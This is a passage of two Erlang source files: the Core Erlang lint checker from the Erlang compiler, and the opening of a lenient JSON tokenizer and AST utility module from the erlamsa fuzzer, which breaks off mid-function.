defined_funcs(Fs) ->
foldl(fun ({#c_var{name={_I,_A}=IA},_}, Def) ->
add_element(IA, Def)
end, [], Fs).
%% return_status(State) ->
%% {ok,[Warning]} | {error,[Error],[Warning]}
%% Pack errors and warnings properly and return ok | error.
return_status(St) ->
Ws = reverse(St#lint.warnings),
case reverse(St#lint.errors) of
[] -> {ok,[{St#lint.module,Ws}]};
Es -> {error,[{St#lint.module,Es}],[{St#lint.module,Ws}]}
end.
%% add_error(ErrorDescriptor, State) -> State'
%% add_warning(ErrorDescriptor, State) -> State'
%% Note that we don't use line numbers here.
add_error(E, St) -> St#lint{errors=[{none,?MODULE,E}|St#lint.errors]}.
%%add_warning(W, St) -> St#lint{warnings=[{none,core_lint,W}|St#lint.warnings]}.
check_exports(Es, St) ->
case all(fun (#c_var{name={Name,Arity}})
when is_atom(Name), is_integer(Arity) -> true;
(_) -> false
end, Es) of
true -> St;
false -> add_error(invalid_exports, St)
end.
check_attrs(As, St) ->
case all(fun ({#c_literal{},#c_literal{}}) -> true;
(_) -> false
end, As) of
true -> St;
false -> add_error(invalid_attributes, St)
end.
check_state(Es, Defined, St) ->
foldl(fun (#c_var{name={_N,_A}=F}, St1) ->
case is_element(F, Defined) of
true -> St1;
false -> add_error({undefined_function,F}, St)
end
end, St, Es).
%% module_defs(CoreBody, Defined, State) -> State.
module_defs(B, Def, St) ->
%% Set top level function name.
foldl(fun (Func, St0) ->
{#c_var{name={_F,_A}=FA},_} = Func,
St1 = St0#lint{func=FA},
function(Func, Def, St1)
end, St, B).
%% functions([Fdef], Defined, State) -> State.
functions(Fs, Def, Rt, St0) ->
foldl(fun ({_Name,#c_fun{vars=Vs,body=B}}, Sti0) ->
{Vvs,St} = variable_list(Vs, Sti0),
body(B, union(Vvs, Def), Rt, St);
(_, St) ->
add_error({illegal_expr,St#lint.func}, St)
end, St0, Fs).
%% function(CoreFunc, Defined, State) -> State.
function({#c_var{name={_,_}},B}, Def, St) ->
%% Body must be a fun!
case B of
#c_fun{} -> expr(B, Def, 1, St);
_ -> add_error({illegal_expr,St#lint.func}, St)
end.
%% body(Expr, Defined, RetCount, State) -> State.
body(#c_values{es=Es}, Def, Rt, St) ->
return_match(Rt, length(Es), expr_list(Es, Def, St));
body(E, Def, Rt, St0) ->
St1 = expr(E, Def, Rt, St0),
case is_simple_top(E) of
true -> return_match(Rt, 1, St1);
false -> St1
end.
%% guard(Expr, Defined, State) -> State.
%% Guards are boolean expressions with test wrapped in a protected.
guard(Expr, Def, St) -> gexpr(Expr, Def, 1, St).
%% guard_list([Expr], Defined, State) -> State.
%% guard_list(Es, Def, St0) ->
%% foldl(fun (E, St) -> guard(E, Def, St) end, St0, Es).
%% gbody(Expr, Defined, RetCount, State) -> State.
gbody(#c_values{es=Es}, Def, Rt, St) ->
return_match(Rt, length(Es), gexpr_list(Es, Def, St));
gbody(E, Def, Rt, St0) ->
St1 = gexpr(E, Def, Rt, St0),
case is_simple_top(E) of
true -> return_match(Rt, 1, St1);
false -> St1
end.
gexpr(#c_var{name=N}, Def, Rt, St) when is_atom(N); is_integer(N) ->
return_match(Rt, 1, expr_var(N, Def, St));
gexpr(#c_literal{}, _Def, Rt, St) ->
return_match(Rt, 1, St);
gexpr(#c_cons{hd=H,tl=T}, Def, Rt, St) ->
return_match(Rt, 1, gexpr_list([H,T], Def, St));
gexpr(#c_tuple{es=Es}, Def, Rt, St) ->
return_match(Rt, 1, gexpr_list(Es, Def, St));
gexpr(#c_map{es=Es}, Def, Rt, St) ->
return_match(Rt, 1, gexpr_list(Es, Def, St));
gexpr(#c_map_pair{key=K,val=V}, Def, Rt, St) ->
return_match(Rt, 1, gexpr_list([K,V], Def, St));
gexpr(#c_binary{segments=Ss}, Def, Rt, St) ->
return_match(Rt, 1, gbitstr_list(Ss, Def, St));
gexpr(#c_seq{arg=Arg,body=B}, Def, Rt, St0) ->
St1 = gexpr(Arg, Def, 1, St0),
return_match(Rt, 1, gbody(B, Def, Rt, St1));
gexpr(#c_let{vars=Vs,arg=Arg,body=B}, Def, Rt, St0) ->
St1 = gbody(Arg, Def, let_varcount(Vs), St0), %This is a guard body
{Lvs,St2} = variable_list(Vs, St1),
gbody(B, union(Lvs, Def), Rt, St2);
gexpr(#c_call{module=#c_literal{val=erlang},name=#c_literal{val=is_record},
args=[Arg,#c_literal{val=Tag},#c_literal{val=Size}]},
Def, Rt, St) when is_atom(Tag), is_integer(Size) ->
return_match(Rt, 1, gexpr(Arg, Def, 1, St));
gexpr(#c_call{module=#c_literal{val=erlang},name=#c_literal{val=is_record}},
_Def, Rt, St) ->
return_match(Rt, 1, add_error({illegal_guard,St#lint.func}, St));
gexpr(#c_call{module=#c_literal{val=erlang},name=#c_literal{val=Name},args=As},
Def, Rt, St0) when is_atom(Name) ->
St1 = return_match(Rt, 1, St0),
case is_guard_bif(Name, length(As)) of
true ->
gexpr_list(As, Def, St1);
false ->
add_error({illegal_guard,St1#lint.func}, St1)
end;
gexpr(#c_primop{name=#c_literal{val=A},args=As}, Def, _Rt, St0) when is_atom(A) ->
gexpr_list(As, Def, St0);
gexpr(#c_try{arg=E,vars=[#c_var{name=X}],body=#c_var{name=X},
evars=[#c_var{},#c_var{}],handler=#c_literal{val=false}},
Def, Rt, St) ->
gbody(E, Def, Rt, St);
gexpr(#c_case{arg=Arg,clauses=Cs}, Def, Rt, St0) ->
PatCount = case_patcount(Cs),
St1 = gbody(Arg, Def, PatCount, St0),
clauses(Cs, Def, PatCount, Rt, St1);
gexpr(_Core, _, _, St) ->
%%io:fwrite("clint gexpr: ~p~n", [_Core]),
add_error({illegal_guard,St#lint.func}, St).
%% gexpr_list([Expr], Defined, State) -> State.
gexpr_list(Es, Def, St0) ->
foldl(fun (E, St) -> gexpr(E, Def, 1, St) end, St0, Es).
%% gbitstr_list([Elem], Defined, State) -> State.
gbitstr_list(Es, Def, St0) ->
foldl(fun (E, St) -> gbitstr(E, Def, St) end, St0, Es).
gbitstr(#c_bitstr{val=V,size=S}, Def, St) ->
gexpr_list([V,S], Def, St).
%% is_guard_bif(Name, Arity) -> Boolean.
is_guard_bif(Name, Arity) ->
erl_internal:guard_bif(Name, Arity)
orelse erl_internal:arith_op(Name, Arity)
orelse erl_internal:bool_op(Name, Arity)
orelse erl_internal:comp_op(Name, Arity).
%% expr(Expr, Defined, RetCount, State) -> State.
expr(#c_var{name={_,_}=FA}, Def, Rt, St) ->
return_match(Rt, 1, expr_fname(FA, Def, St));
expr(#c_var{name=N}, Def, Rt, St) ->
return_match(Rt, 1, expr_var(N, Def, St));
expr(#c_literal{}, _Def, Rt, St) ->
return_match(Rt, 1, St);
expr(#c_cons{hd=H,tl=T}, Def, Rt, St) ->
return_match(Rt, 1, expr_list([H,T], Def, St));
expr(#c_tuple{es=Es}, Def, Rt, St) ->
return_match(Rt, 1, expr_list(Es, Def, St));
expr(#c_map{es=Es}, Def, Rt, St) ->
return_match(Rt, 1, expr_list(Es, Def, St));
expr(#c_map_pair{key=K,val=V}, Def, Rt, St) ->
return_match(Rt, 1, expr_list([K,V], Def, St));
expr(#c_binary{segments=Ss}, Def, Rt, St) ->
return_match(Rt, 1, bitstr_list(Ss, Def, St));
expr(#c_fun{vars=Vs,body=B}, Def, Rt, St0) ->
{Vvs,St1} = variable_list(Vs, St0),
return_match(Rt, 1, body(B, union(Vvs, Def), 1, St1));
expr(#c_seq{arg=Arg,body=B}, Def, Rt, St0) ->
St1 = expr(Arg, Def, 1, St0),
body(B, Def, Rt, St1);
expr(#c_let{vars=Vs,arg=Arg,body=B}, Def, Rt, St0) ->
St1 = body(Arg, Def, let_varcount(Vs), St0), %This is a body
{Lvs,St2} = variable_list(Vs, St1),
body(B, union(Lvs, Def), Rt, St2);
expr(#c_letrec{defs=Fs,body=B}, Def0, Rt, St0) ->
Def1 = union(defined_funcs(Fs), Def0), %All defined stuff
St1 = functions(Fs, Def1, Rt, St0),
body(B, Def1, Rt, St1#lint{func=St0#lint.func});
expr(#c_case{arg=Arg,clauses=Cs}, Def, Rt, St0) ->
Pc = case_patcount(Cs),
St1 = body(Arg, Def, Pc, St0),
clauses(Cs, Def, Pc, Rt, St1);
expr(#c_receive{clauses=Cs,timeout=T,action=A}, Def, Rt, St0) ->
St1 = expr(T, Def, 1, St0),
St2 = body(A, Def, Rt, St1),
clauses(Cs, Def, 1, Rt, St2);
expr(#c_apply{op=Op,args=As}, Def, _Rt, St0) ->
St1 = apply_op(Op, Def, length(As), St0),
return_match(any, 1, expr_list(As, Def, St1));
expr(#c_call{module=#c_literal{val=erlang},name=#c_literal{val=Name},args=As},
Def, Rt, St0) when is_atom(Name) ->
St1 = expr_list(As, Def, St0),
case erl_bifs:is_exit_bif(erlang, Name, length(As)) of
true -> St1;
false -> return_match(Rt, 1, St1)
end;
expr(#c_call{module=M,name=N,args=As}, Def, _Rt, St0) ->
St1 = expr(M, Def, 1, St0),
St2 = expr(N, Def, 1, St1),
expr_list(As, Def, St2);
expr(#c_primop{name=#c_literal{val=A},args=As}, Def, Rt, St0) when is_atom(A) ->
St1 = expr_list(As, Def, St0),
case A of
match_fail -> St1;
recv_peek_message -> return_match(Rt, 2, St1);
_ -> return_match(Rt, 1, St1)
end;
expr(#c_catch{body=B}, Def, Rt, St) ->
return_match(Rt, 1, body(B, Def, 1, St));
expr(#c_try{arg=A,vars=Vs,body=B,evars=Evs,handler=H}, Def, Rt, St0) ->
St1 = case Evs of
[_, _, _] -> St0;
_ -> add_error({illegal_try,St0#lint.func}, St0)
end,
St2 = body(A, Def, let_varcount(Vs), St1),
{Ns,St3} = variable_list(Vs, St2),
St4 = body(B, union(Ns, Def), Rt, St3),
{Ens,St5} = variable_list(Evs, St4),
body(H, union(Ens, Def), Rt, St5);
expr(_Other, _, _, St) ->
%%io:fwrite("clint expr: ~p~n", [_Other]),
add_error({illegal_expr,St#lint.func}, St).
%% expr_list([Expr], Defined, State) -> State.
expr_list(Es, Def, St0) ->
foldl(fun (E, St) -> expr(E, Def, 1, St) end, St0, Es).
%% bitstr_list([Elem], Defined, State) -> State.
bitstr_list(Es, Def, St0) ->
foldl(fun (E, St) -> bitstr(E, Def, St) end, St0, Es).
bitstr(#c_bitstr{val=V,size=S}, Def, St) ->
expr_list([V,S], Def, St).
%% apply_op(Op, Defined, ArgCount, State) -> State.
%% A apply op is either an fname or an expression.
apply_op(#c_var{name={_I,A}=IA}, Def, Ac, St0) ->
St1 = expr_fname(IA, Def, St0),
arg_match(Ac, A, St1);
apply_op(E, Def, _, St) -> expr(E, Def, 1, St). %Hard to check
%% expr_var(VarName, Defined, State) -> State.
expr_var(N, Def, St) ->
case is_element(N, Def) of
true -> St;
false -> add_error({unbound_var,N,St#lint.func}, St)
end.
%% expr_fname(Fname, Defined, State) -> State.
expr_fname(Fname, Def, St) ->
case is_element(Fname, Def) of
true -> St;
false -> add_error({undefined_function,Fname,St#lint.func}, St)
end.
%% let_varcount([Var]) -> int().
let_varcount([]) -> any; %Ignore values
let_varcount(Es) -> length(Es).
%% case_patcount([Clause]) -> int().
case_patcount([#c_clause{pats=Ps}|_]) -> length(Ps).
%% clauses([Clause], Defined, PatCount, RetCount, State) -> State.
clauses(Cs, Def, Pc, Rt, St0) ->
foldl(fun (C, St) -> clause(C, Def, Pc, Rt, St) end, St0, Cs).
%% clause(Clause, Defined, PatCount, RetCount, State) -> State.
clause(#c_clause{pats=Ps,guard=G,body=B}, Def0, Pc, Rt, St0) ->
St1 = pattern_match(Pc, length(Ps), St0),
{Pvs,St2} = pattern_list(Ps, Def0, St1),
Def1 = union(Pvs, Def0),
St3 = guard(G, Def1, St2),
body(B, Def1, Rt, St3).
%% variable(Var, [PatVar], State) -> {[VarName],State}.
variable(#c_var{name=N}, Ps, St) ->
case is_element(N, Ps) of
true -> {[],add_error({duplicate_var,N,St#lint.func}, St)};
false -> {[N],St}
end;
variable(_, Def, St) -> {Def,add_error({not_var,St#lint.func}, St)}.
%% variable_list([Var], State) -> {[Var],State}.
%% variable_list([Var], [PatVar], State) -> {[Var],State}.
variable_list(Vs, St) -> variable_list(Vs, [], St).
variable_list(Vs, Ps, St) ->
foldl(fun (V, {Ps0,St0}) ->
{Vvs,St1} = variable(V, Ps0, St0),
{union(Vvs, Ps0),St1}
end, {Ps,St}, Vs).
%% pattern(Pattern, Defined, State) -> {[PatVar],State}.
%% pattern(Pattern, Defined, [PatVar], State) -> {[PatVar],State}.
%% Patterns are complicated by sizes in binaries. These are pure
%% input variables which create no bindings. We, therefore, need to
%% carry around the original defined variables to get the correct
%% handling.
%% pattern(P, Def, St) -> pattern(P, Def, [], St).
pattern(#c_var{name=N}, Def, Ps, St) ->
pat_var(N, Def, Ps, St);
pattern(#c_literal{}, _Def, Ps, St) -> {Ps,St};
pattern(#c_cons{hd=H,tl=T}, Def, Ps, St) ->
pattern_list([H,T], Def, Ps, St);
pattern(#c_tuple{es=Es}, Def, Ps, St) ->
pattern_list(Es, Def, Ps, St);
pattern(#c_map{es=Es}, Def, Ps, St) ->
pattern_list(Es, Def, Ps, St);
pattern(#c_map_pair{op=#c_literal{val=exact},key=K,val=V}, Def, Ps, St) ->
%% The key is an input.
pat_map_expr(K, Def, St),
pattern_list([V],Def,Ps,St);
pattern(#c_binary{segments=Ss}, Def, Ps, St0) ->
St = pat_bin_tail_check(Ss, St0),
pat_bin(Ss, Def, Ps, St);
pattern(#c_alias{var=V,pat=P}, Def, Ps, St0) ->
{Vvs,St1} = variable(V, Ps, St0),
pattern(P, Def, union(Vvs, Ps), St1);
pattern(_Other, _, Ps, St) ->
%%io:fwrite("clint pattern: ~p~n", [_Other]),
{Ps,add_error({not_pattern,St#lint.func}, St)}.
pat_var(N, _Def, Ps, St) ->
case is_element(N, Ps) of
true -> {Ps,add_error({duplicate_var,N,St#lint.func}, St)};
false -> {add_element(N, Ps),St}
end.
%% pat_bin_list([Elem], Defined, [PatVar], State) -> {[PatVar],State}.
pat_bin(Es, Def, Ps0, St0) ->
foldl(fun (E, {Ps,St}) ->
pat_segment(E, Def, Ps, St)
end, {Ps0,St0}, Es).
pat_segment(#c_bitstr{val=V,size=S,type=T}, Def, Ps0, St0) ->
St1 = pat_bit_expr(S, T, Def, St0),
pattern(V, Def, Ps0, St1);
pat_segment(_, _, Ps, St) ->
{Ps,add_error({not_bs_pattern,St#lint.func}, St)}.
%% pat_bin_tail_check([Elem], State) -> State.
%% There must be at most one tail segment (a size-less segment of
%% type binary) and it must occur at the end.
pat_bin_tail_check([#c_bitstr{size=#c_literal{val=all}}], St) ->
%% Size-less field is OK at the end of the list of segments.
St;
pat_bin_tail_check([#c_bitstr{size=#c_literal{val=all}}|_], St) ->
add_error({tail_segment_not_at_end,St#lint.func}, St);
pat_bin_tail_check([_|Ss], St) ->
pat_bin_tail_check(Ss, St);
pat_bin_tail_check([], St) -> St.
%% pat_bit_expr(SizePat, Type, Defined, State) -> State.
%% Check the Size pattern, this is an input! Because of optimizations,
%% we must allow any kind of constant and literal here.
pat_bit_expr(#c_var{name=N}, _, Def, St) -> expr_var(N, Def, St);
pat_bit_expr(#c_literal{}, _, _, St) -> St;
pat_bit_expr(#c_binary{}, _, _Def, St) ->
%% Literal binaries may be expressed as a bit syntax construction
%% expression if such expression is more compact than the literal.
%% Example: <<0:100000000>>
St;
pat_bit_expr(_, _, _, St) ->
add_error({illegal_expr,St#lint.func}, St).
pat_map_expr(#c_var{name=N}, Def, St) -> expr_var(N, Def, St);
pat_map_expr(#c_literal{}, _Def, St) -> St;
pat_map_expr(_, _, St) -> add_error({illegal_expr,St#lint.func}, St).
%% pattern_list([Var], Defined, State) -> {[PatVar],State}.
%% pattern_list([Var], Defined, [PatVar], State) -> {[PatVar],State}.
pattern_list(Pats, Def, St) -> pattern_list(Pats, Def, [], St).
pattern_list(Pats, Def, Ps0, St0) ->
foldl(fun (P, {Ps,St}) -> pattern(P, Def, Ps, St) end, {Ps0,St0}, Pats).
%% pattern_match(Required, Supplied, State) -> State.
%% Check that the required number of patterns match the supplied.
pattern_match(N, N, St) -> St;
pattern_match(_Req, _Sup, St) ->
add_error({pattern_mismatch,St#lint.func}, St).
%% return_match(Required, Supplied, State) -> State.
%% Check that the required number of return values match the supplied.
return_match(any, _Sup, St) -> St;
return_match(N, N, St) -> St;
return_match(_Req, _Sup, St) ->
add_error({return_mismatch,St#lint.func}, St).
%% arg_match(Required, Supplied, State) -> State.
arg_match(N, N, St) -> St;
arg_match(_Req, _Sup, St) ->
add_error({arg_mismatch,St#lint.func}, St).
%% Only check if the top-level is a simple.
-spec is_simple_top(cerl:cerl()) -> boolean().
is_simple_top(#c_var{}) -> true;
is_simple_top(#c_cons{}) -> true;
is_simple_top(#c_tuple{}) -> true;
is_simple_top(#c_binary{}) -> true;
is_simple_top(#c_literal{}) -> true;
is_simple_top(_) -> false. | lib/compiler/src/core_lint.erl | 0.604632 | 0.431824 | core_lint.erl | starcoder |
% Copyright (c) 2014-2018 <NAME> aka dark_k3y
% Initial implementation was a little slow, so:
% - several optimizations approaches is heavilly based on JSONE implementation
% by Copyright (c) 2013-2016, <NAME> <<EMAIL>> (MIT LICENSE)
% see https://github.com/sile/jsone/blob/master/src/jsone_decode.erl
% for more details
% Usage of original JSONE was not possible due to the fact, that
% erlamsa should be able to parse badly crafted JSON docs
%
% LICENSE
%
% Permission is hereby granted, free of charge, to any person obtaining a copy
% of this software and associated documentation files (the "Software"), to deal
% in the Software without restriction, including without limitation the rights
% to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
% copies of the Software, and to permit persons to whom the Software is
% furnished to do so, subject to the following conditions:
%
% The above copyright notice and this permission notice shall be included in
% all copies or substantial portions of the Software.
%
% THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
% IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
% FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
% SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
% DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
% OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR
% THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-module(erlamsa_json).
-author("dark_k3y").
-compile([export_all]).
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
-compile([export_all]).
-endif.
-include("erlamsa.hrl").
%% API
-export([tokenize/1, tokens_to_erlang/1]).
-define(NOT_SEPARATOR(C),
C =/= $ , C =/= $\n, C =/= $\r, C =/= $\t, C =/= $,, C =/= $], C =/= $}, C =/= $:).
%% TODO: add specs
%%%
%%% Generic functions
%%%
fold_list(F, [H], Acc) ->
R = F(H),
fold_list(F, [], [R | Acc]);
fold_list(F, [H|T], Acc) ->
R = F(H),
fold_list(F, T, [[R, $,] | Acc]);
fold_list(_F, [], Acc) ->
lists:reverse(Acc).
%%%
%%% /Generic functions
%%%
%%%
%%% JSON tokenizer
%%%
% Grammar derived from https://tools.ietf.org/html/rfc7159
% document: ws value ws
% ws : \x20 | \t | \r | \n
% value: string | number | object | array | true | false | null
% elements: value | value ws , ws elements
% array: ws [ ws ] | ws [ ws elements ws ]
% object: ws { ws } | ws { ws members ws }
% members: pair | pair ws , ws members
% pair: string : value
%% document is a ws
tokenize(Bin) ->
lists:reverse(ws(Bin, [value], [])).
ws(<<$\t, Rest/binary>>, Context, Acc) -> ws(Rest, Context, Acc);
ws(<<$\n, Rest/binary>>, Context, Acc) -> ws(Rest, Context, Acc);
ws(<<$\r, Rest/binary>>, Context, Acc) -> ws(Rest, Context, Acc);
ws(<<$ , Rest/binary>>, Context, Acc) -> ws(Rest, Context, Acc);
ws(<<>>, _, Acc) -> Acc;
ws(Bin, Context = [Term|RestContext], Acc) ->
%io:format("111111 ~p~n", [Bin]),
case Term of
array -> array(Bin, [array_end|RestContext], Acc);
{elements, List} -> elements(Bin, RestContext, List, Acc);
object -> object(Bin, [object_end|RestContext], Acc);
{members, Pairs} -> members(Bin, RestContext, Pairs, Acc);
pair -> pair(Bin, RestContext, Acc);
pair_delim -> pair(Bin, Context, Acc);
value -> value(Bin, RestContext, Acc)
end;
ws(_, _, _) -> throw(incorrect_json).
value(<<$[, Rest/binary>>, Context, Acc) ->
ws(Rest, [array|Context], Acc);
value(<<${, Rest/binary>>, Context, Acc) ->
ws(Rest, [object|Context], Acc);
value(<<"true", Rest/binary>>, Context, Acc) ->
push(Rest, Context, {constant, true}, Acc);
value(<<"false", Rest/binary>>, Context, Acc) ->
push(Rest, Context, {constant, false}, Acc);
value(<<"null", Rest/binary>>, Context, Acc) ->
push(Rest, Context, {constant, null}, Acc);
value(<<$", Rest/binary>>, Context, Acc) ->
string(Rest, Context, [], Acc);
value(Bin, Context, Acc) ->
number(Bin, Context, Acc).
%% Arrays
array(<<$], Rest/binary>>, [array_end|Context], Acc) ->
%io:format("0]~n"),
push(Rest, Context, {array, []}, Acc);
array(Bin, Context, Acc) ->
ws(Bin, [value, {elements, []}|Context], Acc).
elements(<<$], Rest/binary>>, [array_end|Context], List, Acc) ->
%io:format("1]~n"),
push(Rest, Context, {array, lists:reverse(List)}, Acc);
elements(<<$,, Rest/binary>>, Context, List, Acc) ->
ws(Rest, [value, {elements, List}|Context], Acc);
elements(<<_C:8, _Rest/binary>>, _Context, _List, _Acc) ->
throw(incorrect_json).
%% Objects
object(<<$}, Rest/binary>>, [object_end|Context], Acc) ->
%io:format("mmmmmm~n"),
push(Rest, Context, {object, []}, Acc);
object(Bin, Context, Acc) ->
ws(Bin, [pair, {members, []}|Context], Acc).
members(<<$}, Rest/binary>>, [object_end|Context], Pairs, Acc) ->
%io:format("nnnnnnnnn ~p~n", [{Rest, [value|Context], [{object, lists:reverse(Pairs)}|Acc]}]),
push(Rest, Context, {object, lists:reverse(Pairs)}, Acc);
members(<<$,, Rest/binary>>, Context, Pairs, Acc) ->
ws(Rest, [pair, {members, Pairs}|Context], Acc);
members(<<_C:8, _Rest/binary>>, _Context, _Pairs, _Acc) ->
throw(incorrect_json).
pair(<<$:, Rest/binary>>, [pair_delim | Context], Acc) ->
%io:format("1: ~p~n", [{Rest, Context, Acc}]),
ws(Rest, [value, pair_end | Context], Acc);
pair(Bin, Context, Acc) ->
%io:format("2: ~p~n", [{Bin, Context, Acc}]),
ws(Bin, [value, pair_delim | Context], Acc).
%% Primitive values parsing
push(Bin, [], Value, Acc) ->
ws(Bin, [], [Value|Acc]);
push(Bin, [{elements, List} | Context], Value, Acc) ->
%io:format("!!!!~p, ~p, ~p~n", [Bin, [{elements, [Value|List]} | Context], Acc]),
ws(Bin, [{elements, [Value|List]} | Context], Acc);
push(Bin, [{members, List} | Context], Value, Acc) ->
%io:format("!!!!~p, ~p, ~p~n", [Bin, [{members, [Value|List]} | Context], Acc]),
ws(Bin, [{members, [Value|List]} | Context], Acc);
push(Bin, [pair_delim | Context], Key, Acc) ->
ws(Bin, [pair_delim, {pair_start, Key} | Context], Acc);
push(Bin, [pair_end, {pair_start, Key} | Context], Value, Acc) ->
push(Bin, Context, {pair, Key, Value}, Acc);
push(_, _, _, _) -> throw(incorrect_json).
%% TODO: more effective way to handle big strings
%% this may be slow in some cases
string(<<$", Rest/binary>>, Context, RevStr, Acc) ->
push(Rest, Context, {string, lists:reverse(RevStr)}, Acc);
string(<<C:8, Rest/binary>>, Context, RevStr, Acc) ->
string(Rest, Context, [C|RevStr], Acc);
string(<<>>, Context, RevStr, Acc) ->
push(<<>>, Context, {junkstring, lists:reverse([$"|RevStr])}, Acc).
number(<<C:8, Rest/binary>>, Context, Acc) when ?NOT_SEPARATOR(C) ->
number_rest(Rest, Context, [C], Acc);
number(_, _, _) -> throw(incorrect_json).
number_rest(<<C:8, Rest/binary>>, Context, N, Acc) when ?NOT_SEPARATOR(C) ->
number_rest(Rest, Context, [C|N], Acc);
number_rest(Bin, Context, N, Acc) ->
push(Bin, Context, {number, lists:reverse(N)}, Acc).
%%%
%%% /JSON tokenizer
%%%
%%%
%%% JSON AST -> Erlang dictionaries
%%%
tokens_to_erlang(Ast) when is_list(Ast) ->
lists:map(fun tokens_to_erlang/1, Ast);
tokens_to_erlang({object, Lst}) ->
Pairs = lists:map(fun tokens_to_erlang/1, Lst),
lists:foldl(fun ({Key, Value}, Acc) -> maps:put(Key, Value, Acc) end,
maps:new(), Pairs);
tokens_to_erlang({array, Lst}) ->
lists:map(fun tokens_to_erlang/1, Lst);
tokens_to_erlang({pair, Key, Value}) ->
{tokens_to_erlang(Key), tokens_to_erlang(Value)};
tokens_to_erlang({string, Value}) ->
Value;
%% TODO: nested try/catch, fix me:
tokens_to_erlang({number, Value}) ->
try list_to_integer(Value) of
Int -> Int
catch error:badarg ->
try list_to_float(Value) of
Float -> Float
catch error:badarg ->
invalid_number
end
end;
tokens_to_erlang(Token) ->
Token.
%%%
%%% /JSON AST -> Erlang dictionaries
%%%
%%%
%%% JSON AST Folder
%%%
%% TODO: beautify parameter to insert ' ' and '\n'
%% handle incorrect AST that could appear during mutations
fold_ast_noarray(H, Acc) when is_list(H), length(H) > 1 ->
M = fold_list(fun (A) -> fold_ast(A, []) end, H, []),
fold_ast([], [M | Acc]);
fold_ast_noarray(H, Acc) ->
fold_ast(H, Acc).
fold_ast([H], Acc) ->
fold_ast(H, Acc);
fold_ast({pair, P1, P2}, Acc) ->
P1Json = fold_ast(P1, []),
P2Json = fold_ast(P2, []),
[P1Json, ":", P2Json | Acc];
fold_ast({junkstring, Value}, Acc) ->
[$", Value, $" | Acc];
fold_ast({string, Value}, Acc) ->
[$", Value, $" | Acc];
fold_ast({constant, Value}, Acc) when is_atom(Value) ->
[atom_to_list(Value) | Acc];
fold_ast({number, Value}, Acc) ->
[Value | Acc];
fold_ast({object, Els}, Acc) ->
["{", fold_ast_noarray(Els, []), "}" | Acc];
fold_ast({array, Els}, Acc) ->
["[", fold_ast_noarray(Els, []), "]" | Acc];
fold_ast([], Acc) ->
lists:flatten(Acc);
%% handle incorrect AST that could appear during mutations
fold_ast(H, Acc) when is_list(H), length(H) > 1 ->
M = fold_list(fun (A) -> fold_ast(A, []) end, H, []),
fold_ast([], ["[", M, "]" | Acc]).
%% if binary, nothing to do here
fold_ast(Binary) when is_binary(Binary) ->
Binary;
%% default
fold_ast(Ast) ->
list_to_binary(fold_ast(Ast, [])).
%%%
%%% /JSON AST Folder
%%%
%%%
%%% JSON AST utils
%%%
walk_reverse(L) when is_list(L) -> lists:reverse(L);
walk_reverse(L) -> L.
walk_uncons1(L) when is_list(L), length(L) =:= 1 -> hd(L);
walk_uncons1(L) -> L.
walk(Ast, Fun, InitAcc) ->
{Res, ResT, ResN} = lists:foldl(
fun
Walker({Type, Els}, {Acc, CountT, Count}) when Type =:= object; Type =:= array ->
%io:format("Object or Array: ~p : ~p~n", [{Type, Els}, {Acc, Count}]),
{ChildAcc, ChildTagCnt, ChildCnt} = Walker(Els, {InitAcc, CountT + 1, Count + 1}),
{Fun({Type, walk_reverse(ChildAcc)}, Acc, CountT + 1, Count + 1), ChildTagCnt, ChildCnt};
Walker({pair, El1, El2}, {Acc, CountT, Count}) ->
%io:format("Pair: ~p : ~p~n", [{pair, El1, El2}, {Acc, Count}]),
{ChildAcc1, ChildTagCnt1, ChildCnt1} = Walker(El1, {InitAcc, CountT, Count + 1}),
{ChildAcc2, ChildTagCnt2, ChildCnt2} = Walker(El2, {InitAcc, ChildTagCnt1, ChildCnt1}),
{Fun({pair, walk_uncons1(walk_reverse(ChildAcc1)),
walk_uncons1(walk_reverse(ChildAcc2))}, Acc, CountT, Count + 1), ChildTagCnt2, ChildCnt2};
Walker(El, {Acc, CountT, Count}) when is_list(El) ->
%io:format("List: ~p : ~p~n", [El, {Acc, Count}]),
lists:foldl(fun(A, B) -> Walker(A, B) end, {Acc, CountT, Count}, El);
Walker(Elem, {Acc, CountT, Count}) ->
%io:format("Single elem: ~p : ~p~n", [Elem, {Acc, Count}]),
{Fun(Elem, Acc, CountT, Count + 1), CountT, Count + 1}
end,
{InitAcc, 0, 0}, Ast),
{walk_reverse(Res), ResT, ResN}.
walk2acc(Ast, Fun, InitAcc) ->
{Res, Res2} = lists:foldl(
fun
Walker({Type, Els}, {Acc, Acc2}) when Type =:= object; Type =:= array ->
%io:format("Object or Array: ~p : ~p~n", [{Type, Els}, {Acc, Count}]),
{ChildAcc, ChildAcc2} = Walker(Els, InitAcc),
{UAcc, UAcc2} = Fun({Type, walk_reverse(ChildAcc)}, Acc, Acc2),
{UAcc, [ChildAcc2|UAcc2]};
Walker({pair, El1, El2}, {Acc, Acc2}) ->
%io:format("Pair: ~p : ~p~n", [{pair, El1, El2}, {Acc, Count}]),
{ChildAcc1, ChildAcc12} = Walker(El1, InitAcc),
{ChildAcc2, ChildAcc22} = Walker(El2, InitAcc),
{UAcc, UAcc2} = Fun({pair, walk_uncons1(walk_reverse(ChildAcc1)),
walk_uncons1(walk_reverse(ChildAcc2))}, Acc, Acc2),
{UAcc, [ChildAcc12, ChildAcc22 | UAcc2]};
Walker(El, Acc) when is_list(El) ->
%io:format("List: ~p : ~p~n", [El, {Acc, Count}]),
lists:foldl(fun(A, B) -> Walker(A, B) end, Acc, El);
Walker(Elem, {Acc, Acc2}) ->
%io:format("Single elem: ~p : ~p~n", [Elem, {Acc, Count}]),
Fun(Elem, Acc, Acc2)
end,
InitAcc, Ast),
{walk_reverse(Res), lists:reverse(lists:flatten(Res2))}.
select(Ast, Fun) ->
lists:foldl(
fun
Walker(El = {Type, Els}, {Acc, CountT, Count}) when Type =:= object; Type =:= array ->
case Fun(El, CountT + 1, Count + 1) of
false ->
